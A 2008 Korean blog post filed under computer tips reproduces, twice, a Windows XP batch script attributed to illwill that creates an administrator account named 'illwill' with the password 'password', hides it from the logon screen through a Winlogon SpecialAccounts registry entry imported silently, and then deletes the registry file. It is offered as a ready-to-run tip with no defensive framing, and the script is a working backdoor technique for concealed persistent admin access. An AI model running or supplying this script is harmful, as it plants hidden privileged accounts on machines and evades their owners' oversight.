컴퓨터 사용 팁
엑수피에서 아뒤 숨기는 배치파일
뭉기
2008. 9. 17. 21:19
HideUserXP.bat
# by illwill http://illmob.org
# This will create a hidden user with admin rights in XP
# ( hidden meaning that the username wont appear in the logon screen,
# other users can still see its profile in C:\Documents and Settings etc..)
# To log on to your hidden account, you need to use the Log On To Windows dialog box by pressing Ctrl + Alt + Delete twice.
# Make sure you're logged off all accounts. You can't just switch users.
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [Hkey_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
EXIT
# by illwill http://illmob.org
# This will create a hidden user with admin rights in XP
# ( hidden meaning that the username wont appear in the logon screen,
# other users can still see its profile in C:\Documents and Settings etc..)
# To log on to your hidden account, you need to use the Log On To Windows dialog box by pressing Ctrl + Alt + Delete twice.
# Make sure you're logged off all accounts. You can't just switch users.
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [Hkey_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
EXIT